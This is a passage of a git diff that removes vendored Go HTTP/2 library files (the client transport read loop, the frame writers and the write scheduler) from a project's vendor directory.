cc.mu.Unlock() - } - - cs.bufPipe.BreakWithError(errClosedResponseBody) - return nil -} - -func (rl *clientConnReadLoop) processData(f *DataFrame) error { - cc := rl.cc - cs := cc.streamByID(f.StreamID, f.StreamEnded()) - data := f.Data() - if cs == nil { - cc.mu.Lock() - neverSent := cc.nextStreamID - cc.mu.Unlock() - if f.StreamID >= neverSent { - // We never asked for this. - cc.logf("http2: Transport received unsolicited DATA frame; closing connection") - return ConnectionError(ErrCodeProtocol) - } - // We probably did ask for this, but canceled. Just ignore it. - // TODO: be stricter here? only silently ignore things which - // we canceled, but not things which were closed normally - // by the peer? Tough without accumulating too much state. 
- - // But at least return their flow control: - if f.Length > 0 { - cc.mu.Lock() - cc.inflow.add(int32(f.Length)) - cc.mu.Unlock() - - cc.wmu.Lock() - cc.fr.WriteWindowUpdate(0, uint32(f.Length)) - cc.bw.Flush() - cc.wmu.Unlock() - } - return nil - } - if f.Length > 0 { - // Check connection-level flow control. - cc.mu.Lock() - if cs.inflow.available() >= int32(f.Length) { - cs.inflow.take(int32(f.Length)) - } else { - cc.mu.Unlock() - return ConnectionError(ErrCodeFlowControl) - } - // Return any padded flow control now, since we won't - // refund it later on body reads. - var refund int - if pad := int(f.Length) - len(data); pad > 0 { - refund += pad - } - // Return len(data) now if the stream is already closed, - // since data will never be read. - didReset := cs.didReset - if didReset { - refund += len(data) - } - if refund > 0 { - cc.inflow.add(int32(refund)) - cc.wmu.Lock() - cc.fr.WriteWindowUpdate(0, uint32(refund)) - if !didReset { - cs.inflow.add(int32(refund)) - cc.fr.WriteWindowUpdate(cs.ID, uint32(refund)) - } - cc.bw.Flush() - cc.wmu.Unlock() - } - cc.mu.Unlock() - - if len(data) > 0 && !didReset { - if _, err := cs.bufPipe.Write(data); err != nil { - rl.endStreamError(cs, err) - return err - } - } - } - - if f.StreamEnded() { - rl.endStream(cs) - } - return nil -} - -var errInvalidTrailers = errors.New("http2: invalid trailers") - -func (rl *clientConnReadLoop) endStream(cs *clientStream) { - // TODO: check that any declared content-length matches, like - // server.go's (*stream).endStream method. - rl.endStreamError(cs, nil) -} - -func (rl *clientConnReadLoop) endStreamError(cs *clientStream, err error) { - var code func() - if err == nil { - err = io.EOF - code = cs.copyTrailers - } - cs.bufPipe.closeWithErrorAndCode(err, code) - delete(rl.activeRes, cs.ID) - if isConnectionCloseRequest(cs.req) { - rl.closeWhenIdle = true - } - - select { - case cs.resc <- resAndError{err: err}: - default: - } -} - -func (cs *clientStream) copyTrailers() { - for k, vv := range cs.trailer { - t := cs.resTrailer - if *t == nil { - *t = make(http.Header) - } - (*t)[k] = vv - } -} - -func (rl *clientConnReadLoop) processGoAway(f *GoAwayFrame) error { - cc := rl.cc - cc.t.connPool().MarkDead(cc) - if f.ErrCode != 0 { - // TODO: deal with GOAWAY more. particularly the error code - cc.vlogf("transport got GOAWAY with error code = %v", f.ErrCode) - } - cc.setGoAway(f) - return nil -} - -func (rl *clientConnReadLoop) processSettings(f *SettingsFrame) error { - cc := rl.cc - cc.mu.Lock() - defer cc.mu.Unlock() - - if f.IsAck() { - if cc.wantSettingsAck { - cc.wantSettingsAck = false - return nil - } - return ConnectionError(ErrCodeProtocol) - } - - err := f.ForeachSetting(func(s Setting) error { - switch s.ID { - case SettingMaxFrameSize: - cc.maxFrameSize = s.Val - case SettingMaxConcurrentStreams: - cc.maxConcurrentStreams = s.Val - case SettingInitialWindowSize: - // Values above the maximum flow-control - // window size of 2^31-1 MUST be treated as a - // connection error (Section 5.4.1) of type - // FLOW_CONTROL_ERROR. - if s.Val > math.MaxInt32 { - return ConnectionError(ErrCodeFlowControl) - } - - // Adjust flow control of currently-open - // frames by the difference of the old initial - // window size and this one. - delta := int32(s.Val) - int32(cc.initialWindowSize) - for _, cs := range cc.streams { - cs.flow.add(delta) - } - cc.cond.Broadcast() - - cc.initialWindowSize = s.Val - default: - // TODO(bradfitz): handle more settings? SETTINGS_HEADER_TABLE_SIZE probably. 
- cc.vlogf("Unhandled Setting: %v", s) - } - return nil - }) - if err != nil { - return err - } - - cc.wmu.Lock() - defer cc.wmu.Unlock() - - cc.fr.WriteSettingsAck() - cc.bw.Flush() - return cc.werr -} - -func (rl *clientConnReadLoop) processWindowUpdate(f *WindowUpdateFrame) error { - cc := rl.cc - cs := cc.streamByID(f.StreamID, false) - if f.StreamID != 0 && cs == nil { - return nil - } - - cc.mu.Lock() - defer cc.mu.Unlock() - - fl := &cc.flow - if cs != nil { - fl = &cs.flow - } - if !fl.add(int32(f.Increment)) { - return ConnectionError(ErrCodeFlowControl) - } - cc.cond.Broadcast() - return nil -} - -func (rl *clientConnReadLoop) processResetStream(f *RSTStreamFrame) error { - cs := rl.cc.streamByID(f.StreamID, true) - if cs == nil { - // TODO: return error if server tries to RST_STEAM an idle stream - return nil - } - select { - case <-cs.peerReset: - // Already reset. - // This is the only goroutine - // which closes this, so there - // isn't a race. - default: - err := streamError(cs.ID, f.ErrCode) - cs.resetErr = err - close(cs.peerReset) - cs.bufPipe.CloseWithError(err) - cs.cc.cond.Broadcast() // wake up checkResetOrDone via clientStream.awaitFlowControl - } - delete(rl.activeRes, cs.ID) - return nil -} - -// Ping sends a PING frame to the server and waits for the ack. -// Public implementation is in go17.go and not_go17.go -func (cc *ClientConn) ping(ctx contextContext) error { - c := make(chan struct{}) - // Generate a random payload - var p [8]byte - for { - if _, err := rand.Read(p[:]); err != nil { - return err - } - cc.mu.Lock() - // check for dup before insert - if _, found := cc.pings[p]; !found { - cc.pings[p] = c - cc.mu.Unlock() - break - } - cc.mu.Unlock() - } - cc.wmu.Lock() - if err := cc.fr.WritePing(false, p); err != nil { - cc.wmu.Unlock() - return err - } - if err := cc.bw.Flush(); err != nil { - cc.wmu.Unlock() - return err - } - cc.wmu.Unlock() - select { - case <-c: - return nil - case <-ctx.Done(): - return ctx.Err() - case <-cc.readerDone: - // connection closed - return cc.readerErr - } -} - -func (rl *clientConnReadLoop) processPing(f *PingFrame) error { - if f.IsAck() { - cc := rl.cc - cc.mu.Lock() - defer cc.mu.Unlock() - // If ack, notify listener if any - if c, ok := cc.pings[f.Data]; ok { - close(c) - delete(cc.pings, f.Data) - } - return nil - } - cc := rl.cc - cc.wmu.Lock() - defer cc.wmu.Unlock() - if err := cc.fr.WritePing(true, f.Data); err != nil { - return err - } - return cc.bw.Flush() -} - -func (rl *clientConnReadLoop) processPushPromise(f *PushPromiseFrame) error { - // We told the peer we don't want them. - // Spec says: - // "PUSH_PROMISE MUST NOT be sent if the SETTINGS_ENABLE_PUSH - // setting of the peer endpoint is set to 0. An endpoint that - // has set this setting and has received acknowledgement MUST - // treat the receipt of a PUSH_PROMISE frame as a connection - // error (Section 5.4.1) of type PROTOCOL_ERROR." - return ConnectionError(ErrCodeProtocol) -} - -func (cc *ClientConn) writeStreamReset(streamID uint32, code ErrCode, err error) { - // TODO: map err to more interesting error codes, once the - // HTTP community comes up with some. But currently for - // RST_STREAM there's no equivalent to GOAWAY frame's debug - // data, and the error codes are all pretty vague ("cancel"). 
- cc.wmu.Lock() - cc.fr.WriteRSTStream(streamID, code) - cc.bw.Flush() - cc.wmu.Unlock() -} - -var ( - errResponseHeaderListSize = errors.New("http2: response header list larger than advertised limit") - errPseudoTrailers = errors.New("http2: invalid pseudo header in trailers") -) - -func (cc *ClientConn) logf(format string, args ...interface{}) { - cc.t.logf(format, args...) -} - -func (cc *ClientConn) vlogf(format string, args ...interface{}) { - cc.t.vlogf(format, args...) -} - -func (t *Transport) vlogf(format string, args ...interface{}) { - if VerboseLogs { - t.logf(format, args...) - } -} - -func (t *Transport) logf(format string, args ...interface{}) { - log.Printf(format, args...) -} - -var noBody io.ReadCloser = ioutil.NopCloser(bytes.NewReader(nil)) - -func strSliceContains(ss []string, s string) bool { - for _, v := range ss { - if v == s { - return true - } - } - return false -} - -type erringRoundTripper struct{ err error } - -func (rt erringRoundTripper) RoundTrip(*http.Request) (*http.Response, error) { return nil, rt.err } - -// gzipReader wraps a response body so it can lazily -// call gzip.NewReader on the first call to Read -type gzipReader struct { - body io.ReadCloser // underlying Response.Body - zr *gzip.Reader // lazily-initialized gzip reader - zerr error // sticky error -} - -func (gz *gzipReader) Read(p []byte) (n int, err error) { - if gz.zerr != nil { - return 0, gz.zerr - } - if gz.zr == nil { - gz.zr, err = gzip.NewReader(gz.body) - if err != nil { - gz.zerr = err - return 0, err - } - } - return gz.zr.Read(p) -} - -func (gz *gzipReader) Close() error { - return gz.body.Close() -} - -type errorReader struct{ err error } - -func (r errorReader) Read(p []byte) (int, error) { return 0, r.err } - -// bodyWriterState encapsulates various state around the Transport's writing -// of the request body, particularly regarding doing delayed writes of the body -// when the request contains "Expect: 100-continue". -type bodyWriterState struct { - cs *clientStream - timer *time.Timer // if non-nil, we're doing a delayed write - fnonce *sync.Once // to call fn with - fn func() // the code to run in the goroutine, writing the body - resc chan error // result of fn's execution - delay time.Duration // how long we should delay a delayed write for -} - -func (t *Transport) getBodyWriterState(cs *clientStream, body io.Reader) (s bodyWriterState) { - s.cs = cs - if body == nil { - return - } - resc := make(chan error, 1) - s.resc = resc - s.fn = func() { - cs.cc.mu.Lock() - cs.startedWrite = true - cs.cc.mu.Unlock() - resc <- cs.writeRequestBody(body, cs.req.Body) - } - s.delay = t.expectContinueTimeout() - if s.delay == 0 || - !httplex.HeaderValuesContainsToken( - cs.req.Header["Expect"], - "100-continue") { - return - } - s.fnonce = new(sync.Once) - - // Arm the timer with a very large duration, which we'll - // intentionally lower later. It has to be large now because - // we need a handle to it before writing the headers, but the - // s.delay value is defined to not start until after the - // request headers were written. - const hugeDuration = 365 * 24 * time.Hour - s.timer = time.AfterFunc(hugeDuration, func() { - s.fnonce.Do(s.fn) - }) - return -} - -func (s bodyWriterState) cancel() { - if s.timer != nil { - s.timer.Stop() - } -} - -func (s bodyWriterState) on100() { - if s.timer == nil { - // If we didn't do a delayed write, ignore the server's - // bogus 100 continue response. 
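// The delayed body write managed above only engages when the caller opts in
// with "Expect: 100-continue" and a non-zero ExpectContinueTimeout. A minimal
// client-side sketch of that opt-in, assuming ConfigureTransport from this
// package; the URL, body, and timeout are invented.
package main

import (
	"net/http"
	"strings"
	"time"

	"golang.org/x/net/http2"
)

func main() {
	t1 := &http.Transport{ExpectContinueTimeout: 500 * time.Millisecond}
	if err := http2.ConfigureTransport(t1); err != nil {
		panic(err)
	}
	req, err := http.NewRequest("POST", "https://example.com/upload", strings.NewReader("payload"))
	if err != nil {
		panic(err)
	}
	req.Header.Set("Expect", "100-continue") // body write waits for 100 Continue or the timeout
	resp, err := (&http.Client{Transport: t1}).Do(req)
	if err == nil {
		resp.Body.Close()
	}
}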
- return - } - s.timer.Stop() - go func() { s.fnonce.Do(s.fn) }() -} - -// scheduleBodyWrite starts writing the body, either immediately (in -// the common case) or after the delay timeout. It should not be -// called until after the headers have been written. -func (s bodyWriterState) scheduleBodyWrite() { - if s.timer == nil { - // We're not doing a delayed write (see - // getBodyWriterState), so just start the writing - // goroutine immediately. - go s.fn() - return - } - traceWait100Continue(s.cs.trace) - if s.timer.Stop() { - s.timer.Reset(s.delay) - } -} - -// isConnectionCloseRequest reports whether req should use its own -// connection for a single request and then close the connection. -func isConnectionCloseRequest(req *http.Request) bool { - return req.Close || httplex.HeaderValuesContainsToken(req.Header["Connection"], "close") -} diff --git a/vendor/golang.org/x/net/http2/write.go b/vendor/golang.org/x/net/http2/write.go deleted file mode 100644 index 6b0dfae3..00000000 --- a/vendor/golang.org/x/net/http2/write.go +++ /dev/null @@ -1,370 +0,0 @@ -// Copyright 2014 The Go Authors. All rights reserved. -// Use of this source code is governed by a BSD-style -// license that can be found in the LICENSE file. - -package http2 - -import ( - "bytes" - "fmt" - "log" - "net/http" - "net/url" - "time" - - "golang.org/x/net/http2/hpack" - "golang.org/x/net/lex/httplex" -) - -// writeFramer is implemented by any type that is used to write frames. -type writeFramer interface { - writeFrame(writeContext) error - - // staysWithinBuffer reports whether this writer promises that - // it will only write less than or equal to size bytes, and it - // won't Flush the write context. - staysWithinBuffer(size int) bool -} - -// writeContext is the interface needed by the various frame writer -// types below. All the writeFrame methods below are scheduled via the -// frame writing scheduler (see writeScheduler in writesched.go). -// -// This interface is implemented by *serverConn. -// -// TODO: decide whether to a) use this in the client code (which didn't -// end up using this yet, because it has a simpler design, not -// currently implementing priorities), or b) delete this and -// make the server code a bit more concrete. -type writeContext interface { - Framer() *Framer - Flush() error - CloseConn() error - // HeaderEncoder returns an HPACK encoder that writes to the - // returned buffer. - HeaderEncoder() (*hpack.Encoder, *bytes.Buffer) -} - -// writeEndsStream reports whether w writes a frame that will transition -// the stream to a half-closed local state. This returns false for RST_STREAM, -// which closes the entire stream (not just the local half). -func writeEndsStream(w writeFramer) bool { - switch v := w.(type) { - case *writeData: - return v.endStream - case *writeResHeaders: - return v.endStream - case nil: - // This can only happen if the caller reuses w after it's - // been intentionally nil'ed out to prevent use. Keep this - // here to catch future refactoring breaking it. 
- panic("writeEndsStream called on nil writeFramer") - } - return false -} - -type flushFrameWriter struct{} - -func (flushFrameWriter) writeFrame(ctx writeContext) error { - return ctx.Flush() -} - -func (flushFrameWriter) staysWithinBuffer(max int) bool { return false } - -type writeSettings []Setting - -func (s writeSettings) staysWithinBuffer(max int) bool { - const settingSize = 6 // uint16 + uint32 - return frameHeaderLen+settingSize*len(s) <= max - -} - -func (s writeSettings) writeFrame(ctx writeContext) error { - return ctx.Framer().WriteSettings([]Setting(s)...) -} - -type writeGoAway struct { - maxStreamID uint32 - code ErrCode -} - -func (p *writeGoAway) writeFrame(ctx writeContext) error { - err := ctx.Framer().WriteGoAway(p.maxStreamID, p.code, nil) - if p.code != 0 { - ctx.Flush() // ignore error: we're hanging up on them anyway - time.Sleep(50 * time.Millisecond) - ctx.CloseConn() - } - return err -} - -func (*writeGoAway) staysWithinBuffer(max int) bool { return false } // flushes - -type writeData struct { - streamID uint32 - p []byte - endStream bool -} - -func (w *writeData) String() string { - return fmt.Sprintf("writeData(stream=%d, p=%d, endStream=%v)", w.streamID, len(w.p), w.endStream) -} - -func (w *writeData) writeFrame(ctx writeContext) error { - return ctx.Framer().WriteData(w.streamID, w.endStream, w.p) -} - -func (w *writeData) staysWithinBuffer(max int) bool { - return frameHeaderLen+len(w.p) <= max -} - -// handlerPanicRST is the message sent from handler goroutines when -// the handler panics. -type handlerPanicRST struct { - StreamID uint32 -} - -func (hp handlerPanicRST) writeFrame(ctx writeContext) error { - return ctx.Framer().WriteRSTStream(hp.StreamID, ErrCodeInternal) -} - -func (hp handlerPanicRST) staysWithinBuffer(max int) bool { return frameHeaderLen+4 <= max } - -func (se StreamError) writeFrame(ctx writeContext) error { - return ctx.Framer().WriteRSTStream(se.StreamID, se.Code) -} - -func (se StreamError) staysWithinBuffer(max int) bool { return frameHeaderLen+4 <= max } - -type writePingAck struct{ pf *PingFrame } - -func (w writePingAck) writeFrame(ctx writeContext) error { - return ctx.Framer().WritePing(true, w.pf.Data) -} - -func (w writePingAck) staysWithinBuffer(max int) bool { return frameHeaderLen+len(w.pf.Data) <= max } - -type writeSettingsAck struct{} - -func (writeSettingsAck) writeFrame(ctx writeContext) error { - return ctx.Framer().WriteSettingsAck() -} - -func (writeSettingsAck) staysWithinBuffer(max int) bool { return frameHeaderLen <= max } - -// splitHeaderBlock splits headerBlock into fragments so that each fragment fits -// in a single frame, then calls fn for each fragment. firstFrag/lastFrag are true -// for the first/last fragment, respectively. -func splitHeaderBlock(ctx writeContext, headerBlock []byte, fn func(ctx writeContext, frag []byte, firstFrag, lastFrag bool) error) error { - // For now we're lazy and just pick the minimum MAX_FRAME_SIZE - // that all peers must support (16KB). Later we could care - // more and send larger frames if the peer advertised it, but - // there's little point. Most headers are small anyway (so we - // generally won't have CONTINUATION frames), and extra frames - // only waste 9 bytes anyway. 
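// In frame terms, the 16 KB cap described above turns one oversized header
// block into a HEADERS frame followed by CONTINUATION frames, with END_HEADERS
// set only on the last fragment. A standalone sketch using an invented
// 40,000-byte block:
package main

import "fmt"

func main() {
	const maxFrameSize = 16384 // minimum MAX_FRAME_SIZE every peer must accept
	remaining := 40000         // pretend HPACK-encoded header block size

	for i := 0; remaining > 0; i++ {
		n := remaining
		if n > maxFrameSize {
			n = maxFrameSize
		}
		remaining -= n
		frame := "CONTINUATION"
		if i == 0 {
			frame = "HEADERS"
		}
		fmt.Printf("%-12s %5d bytes (END_HEADERS=%v)\n", frame, n, remaining == 0)
	}
}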
- const maxFrameSize = 16384 - - first := true - for len(headerBlock) > 0 { - frag := headerBlock - if len(frag) > maxFrameSize { - frag = frag[:maxFrameSize] - } - headerBlock = headerBlock[len(frag):] - if err := fn(ctx, frag, first, len(headerBlock) == 0); err != nil { - return err - } - first = false - } - return nil -} - -// writeResHeaders is a request to write a HEADERS and 0+ CONTINUATION frames -// for HTTP response headers or trailers from a server handler. -type writeResHeaders struct { - streamID uint32 - httpResCode int // 0 means no ":status" line - h http.Header // may be nil - trailers []string // if non-nil, which keys of h to write. nil means all. - endStream bool - - date string - contentType string - contentLength string -} - -func encKV(enc *hpack.Encoder, k, v string) { - if VerboseLogs { - log.Printf("http2: server encoding header %q = %q", k, v) - } - enc.WriteField(hpack.HeaderField{Name: k, Value: v}) -} - -func (w *writeResHeaders) staysWithinBuffer(max int) bool { - // TODO: this is a common one. It'd be nice to return true - // here and get into the fast path if we could be clever and - // calculate the size fast enough, or at least a conservative - // uppper bound that usually fires. (Maybe if w.h and - // w.trailers are nil, so we don't need to enumerate it.) - // Otherwise I'm afraid that just calculating the length to - // answer this question would be slower than the ~2µs benefit. - return false -} - -func (w *writeResHeaders) writeFrame(ctx writeContext) error { - enc, buf := ctx.HeaderEncoder() - buf.Reset() - - if w.httpResCode != 0 { - encKV(enc, ":status", httpCodeString(w.httpResCode)) - } - - encodeHeaders(enc, w.h, w.trailers) - - if w.contentType != "" { - encKV(enc, "content-type", w.contentType) - } - if w.contentLength != "" { - encKV(enc, "content-length", w.contentLength) - } - if w.date != "" { - encKV(enc, "date", w.date) - } - - headerBlock := buf.Bytes() - if len(headerBlock) == 0 && w.trailers == nil { - panic("unexpected empty hpack") - } - - return splitHeaderBlock(ctx, headerBlock, w.writeHeaderBlock) -} - -func (w *writeResHeaders) writeHeaderBlock(ctx writeContext, frag []byte, firstFrag, lastFrag bool) error { - if firstFrag { - return ctx.Framer().WriteHeaders(HeadersFrameParam{ - StreamID: w.streamID, - BlockFragment: frag, - EndStream: w.endStream, - EndHeaders: lastFrag, - }) - } else { - return ctx.Framer().WriteContinuation(w.streamID, lastFrag, frag) - } -} - -// writePushPromise is a request to write a PUSH_PROMISE and 0+ CONTINUATION frames. -type writePushPromise struct { - streamID uint32 // pusher stream - method string // for :method - url *url.URL // for :scheme, :authority, :path - h http.Header - - // Creates an ID for a pushed stream. This runs on serveG just before - // the frame is written. The returned ID is copied to promisedID. 
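// encKV above funnels every header through an HPACK encoder before the block
// is split into frames. A minimal standalone sketch of that encoding step via
// the public hpack package; the header values are invented.
package main

import (
	"bytes"
	"fmt"

	"golang.org/x/net/http2/hpack"
)

func main() {
	var buf bytes.Buffer
	enc := hpack.NewEncoder(&buf)

	// Pseudo-header first, then lower-cased regular headers, as writeFrame does.
	for _, hf := range []hpack.HeaderField{
		{Name: ":status", Value: "200"},
		{Name: "content-type", Value: "text/html; charset=utf-8"},
		{Name: "content-length", Value: "1024"},
	} {
		if err := enc.WriteField(hf); err != nil {
			panic(err)
		}
	}
	fmt.Printf("header block: %d bytes: %x\n", buf.Len(), buf.Bytes())
}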
- allocatePromisedID func() (uint32, error) - promisedID uint32 -} - -func (w *writePushPromise) staysWithinBuffer(max int) bool { - // TODO: see writeResHeaders.staysWithinBuffer - return false -} - -func (w *writePushPromise) writeFrame(ctx writeContext) error { - enc, buf := ctx.HeaderEncoder() - buf.Reset() - - encKV(enc, ":method", w.method) - encKV(enc, ":scheme", w.url.Scheme) - encKV(enc, ":authority", w.url.Host) - encKV(enc, ":path", w.url.RequestURI()) - encodeHeaders(enc, w.h, nil) - - headerBlock := buf.Bytes() - if len(headerBlock) == 0 { - panic("unexpected empty hpack") - } - - return splitHeaderBlock(ctx, headerBlock, w.writeHeaderBlock) -} - -func (w *writePushPromise) writeHeaderBlock(ctx writeContext, frag []byte, firstFrag, lastFrag bool) error { - if firstFrag { - return ctx.Framer().WritePushPromise(PushPromiseParam{ - StreamID: w.streamID, - PromiseID: w.promisedID, - BlockFragment: frag, - EndHeaders: lastFrag, - }) - } else { - return ctx.Framer().WriteContinuation(w.streamID, lastFrag, frag) - } -} - -type write100ContinueHeadersFrame struct { - streamID uint32 -} - -func (w write100ContinueHeadersFrame) writeFrame(ctx writeContext) error { - enc, buf := ctx.HeaderEncoder() - buf.Reset() - encKV(enc, ":status", "100") - return ctx.Framer().WriteHeaders(HeadersFrameParam{ - StreamID: w.streamID, - BlockFragment: buf.Bytes(), - EndStream: false, - EndHeaders: true, - }) -} - -func (w write100ContinueHeadersFrame) staysWithinBuffer(max int) bool { - // Sloppy but conservative: - return 9+2*(len(":status")+len("100")) <= max -} - -type writeWindowUpdate struct { - streamID uint32 // or 0 for conn-level - n uint32 -} - -func (wu writeWindowUpdate) staysWithinBuffer(max int) bool { return frameHeaderLen+4 <= max } - -func (wu writeWindowUpdate) writeFrame(ctx writeContext) error { - return ctx.Framer().WriteWindowUpdate(wu.streamID, wu.n) -} - -// encodeHeaders encodes an http.Header. If keys is not nil, then (k, h[k]) -// is encoded only only if k is in keys. -func encodeHeaders(enc *hpack.Encoder, h http.Header, keys []string) { - if keys == nil { - sorter := sorterPool.Get().(*sorter) - // Using defer here, since the returned keys from the - // sorter.Keys method is only valid until the sorter - // is returned: - defer sorterPool.Put(sorter) - keys = sorter.Keys(h) - } - for _, k := range keys { - vv := h[k] - k = lowerHeader(k) - if !validWireHeaderFieldName(k) { - // Skip it as backup paranoia. Per - // golang.org/issue/14048, these should - // already be rejected at a higher level. - continue - } - isTE := k == "transfer-encoding" - for _, v := range vv { - if !httplex.ValidHeaderFieldValue(v) { - // TODO: return an error? golang.org/issue/14048 - // For now just omit it. - continue - } - // TODO: more of "8.1.2.2 Connection-Specific Header Fields" - if isTE && v != "trailers" { - continue - } - encKV(enc, k, v) - } - } -} diff --git a/vendor/golang.org/x/net/http2/writesched.go b/vendor/golang.org/x/net/http2/writesched.go deleted file mode 100644 index 4fe30730..00000000 --- a/vendor/golang.org/x/net/http2/writesched.go +++ /dev/null @@ -1,242 +0,0 @@ -// Copyright 2014 The Go Authors. All rights reserved. -// Use of this source code is governed by a BSD-style -// license that can be found in the LICENSE file. - -package http2 - -import "fmt" - -// WriteScheduler is the interface implemented by HTTP/2 write schedulers. -// Methods are never called concurrently. -type WriteScheduler interface { - // OpenStream opens a new stream in the write scheduler. 
- // It is illegal to call this with streamID=0 or with a streamID that is - // already open -- the call may panic. - OpenStream(streamID uint32, options OpenStreamOptions) - - // CloseStream closes a stream in the write scheduler. Any frames queued on - // this stream should be discarded. It is illegal to call this on a stream - // that is not open -- the call may panic. - CloseStream(streamID uint32) - - // AdjustStream adjusts the priority of the given stream. This may be called - // on a stream that has not yet been opened or has been closed. Note that - // RFC 7540 allows PRIORITY frames to be sent on streams in any state. See: - // https://tools.ietf.org/html/rfc7540#section-5.1 - AdjustStream(streamID uint32, priority PriorityParam) - - // Push queues a frame in the scheduler. In most cases, this will not be - // called with wr.StreamID()!=0 unless that stream is currently open. The one - // exception is RST_STREAM frames, which may be sent on idle or closed streams. - Push(wr FrameWriteRequest) - - // Pop dequeues the next frame to write. Returns false if no frames can - // be written. Frames with a given wr.StreamID() are Pop'd in the same - // order they are Push'd. - Pop() (wr FrameWriteRequest, ok bool) -} - -// OpenStreamOptions specifies extra options for WriteScheduler.OpenStream. -type OpenStreamOptions struct { - // PusherID is zero if the stream was initiated by the client. Otherwise, - // PusherID names the stream that pushed the newly opened stream. - PusherID uint32 -} - -// FrameWriteRequest is a request to write a frame. -type FrameWriteRequest struct { - // write is the interface value that does the writing, once the - // WriteScheduler has selected this frame to write. The write - // functions are all defined in write.go. - write writeFramer - - // stream is the stream on which this frame will be written. - // nil for non-stream frames like PING and SETTINGS. - stream *stream - - // done, if non-nil, must be a buffered channel with space for - // 1 message and is sent the return value from write (or an - // earlier error) when the frame has been written. - done chan error -} - -// StreamID returns the id of the stream this frame will be written to. -// 0 is used for non-stream frames such as PING and SETTINGS. -func (wr FrameWriteRequest) StreamID() uint32 { - if wr.stream == nil { - if se, ok := wr.write.(StreamError); ok { - // (*serverConn).resetStream doesn't set - // stream because it doesn't necessarily have - // one. So special case this type of write - // message. - return se.StreamID - } - return 0 - } - return wr.stream.id -} - -// DataSize returns the number of flow control bytes that must be consumed -// to write this entire frame. This is 0 for non-DATA frames. -func (wr FrameWriteRequest) DataSize() int { - if wd, ok := wr.write.(*writeData); ok { - return len(wd.p) - } - return 0 -} - -// Consume consumes min(n, available) bytes from this frame, where available -// is the number of flow control bytes available on the stream. Consume returns -// 0, 1, or 2 frames, where the integer return value gives the number of frames -// returned. -// -// If flow control prevents consuming any bytes, this returns (_, _, 0). If -// the entire frame was consumed, this returns (wr, _, 1). Otherwise, this -// returns (consumed, rest, 2), where 'consumed' contains the consumed bytes and -// 'rest' contains the remaining bytes. The consumed bytes are deducted from the -// underlying stream's flow control budget. 
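// The Consume contract spelled out above, restated with concrete numbers.
// FrameWriteRequest can only be constructed inside this package, so the
// function below is a stand-in analogue rather than the real method.
package main

import "fmt"

// consume mirrors the 0/1/2-frame result: nothing can be sent, the whole DATA
// payload fits within the allowance, or it is split into a prefix plus a rest.
func consume(p []byte, allowed int32) (first, rest []byte, n int) {
	if allowed <= 0 {
		return nil, nil, 0
	}
	if int32(len(p)) <= allowed {
		return p, nil, 1
	}
	return p[:allowed], p[allowed:], 2
}

func main() {
	data := make([]byte, 20*1024) // a 20 KB DATA payload awaiting flow control
	first, rest, n := consume(data, 8*1024)
	fmt.Println(n, len(first), len(rest)) // prints: 2 8192 12288
}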
-func (wr FrameWriteRequest) Consume(n int32) (FrameWriteRequest, FrameWriteRequest, int) { - var empty FrameWriteRequest - - // Non-DATA frames are always consumed whole. - wd, ok := wr.write.(*writeData) - if !ok || len(wd.p) == 0 { - return wr, empty, 1 - } - - // Might need to split after applying limits. - allowed := wr.stream.flow.available() - if n < allowed { - allowed = n - } - if wr.stream.sc.maxFrameSize < allowed { - allowed = wr.stream.sc.maxFrameSize - } - if allowed <= 0 { - return empty, empty, 0 - } - if len(wd.p) > int(allowed) { - wr.stream.flow.take(allowed) - consumed := FrameWriteRequest{ - stream: wr.stream, - write: &writeData{ - streamID: wd.streamID, - p: wd.p[:allowed], - // Even if the original had endStream set, there - // are bytes remaining because len(wd.p) > allowed, - // so we know endStream is false. - endStream: false, - }, - // Our caller is blocking on the final DATA frame, not - // this intermediate frame, so no need to wait. - done: nil, - } - rest := FrameWriteRequest{ - stream: wr.stream, - write: &writeData{ - streamID: wd.streamID, - p: wd.p[allowed:], - endStream: wd.endStream, - }, - done: wr.done, - } - return consumed, rest, 2 - } - - // The frame is consumed whole. - // NB: This cast cannot overflow because allowed is <= math.MaxInt32. - wr.stream.flow.take(int32(len(wd.p))) - return wr, empty, 1 -} - -// String is for debugging only. -func (wr FrameWriteRequest) String() string { - var des string - if s, ok := wr.write.(fmt.Stringer); ok { - des = s.String() - } else { - des = fmt.Sprintf("%T", wr.write) - } - return fmt.Sprintf("[FrameWriteRequest stream=%d, ch=%v, writer=%v]", wr.StreamID(), wr.done != nil, des) -} - -// replyToWriter sends err to wr.done and panics if the send must block -// This does nothing if wr.done is nil. -func (wr *FrameWriteRequest) replyToWriter(err error) { - if wr.done == nil { - return - } - select { - case wr.done <- err: - default: - panic(fmt.Sprintf("unbuffered done channel passed in for type %T", wr.write)) - } - wr.write = nil // prevent use (assume it's tainted after wr.done send) -} - -// writeQueue is used by implementations of WriteScheduler. -type writeQueue struct { - s []FrameWriteRequest -} - -func (q *writeQueue) empty() bool { return len(q.s) == 0 } - -func (q *writeQueue) push(wr FrameWriteRequest) { - q.s = append(q.s, wr) -} - -func (q *writeQueue) shift() FrameWriteRequest { - if len(q.s) == 0 { - panic("invalid use of queue") - } - wr := q.s[0] - // TODO: less copy-happy queue. - copy(q.s, q.s[1:]) - q.s[len(q.s)-1] = FrameWriteRequest{} - q.s = q.s[:len(q.s)-1] - return wr -} - -// consume consumes up to n bytes from q.s[0]. If the frame is -// entirely consumed, it is removed from the queue. If the frame -// is partially consumed, the frame is kept with the consumed -// bytes removed. Returns true iff any bytes were consumed. -func (q *writeQueue) consume(n int32) (FrameWriteRequest, bool) { - if len(q.s) == 0 { - return FrameWriteRequest{}, false - } - consumed, rest, numresult := q.s[0].Consume(n) - switch numresult { - case 0: - return FrameWriteRequest{}, false - case 1: - q.shift() - case 2: - q.s[0] = rest - } - return consumed, true -} - -type writeQueuePool []*writeQueue - -// put inserts an unused writeQueue into the pool. -func (p *writeQueuePool) put(q *writeQueue) { - for i := range q.s { - q.s[i] = FrameWriteRequest{} - } - q.s = q.s[:0] - *p = append(*p, q) -} - -// get returns an empty writeQueue. 
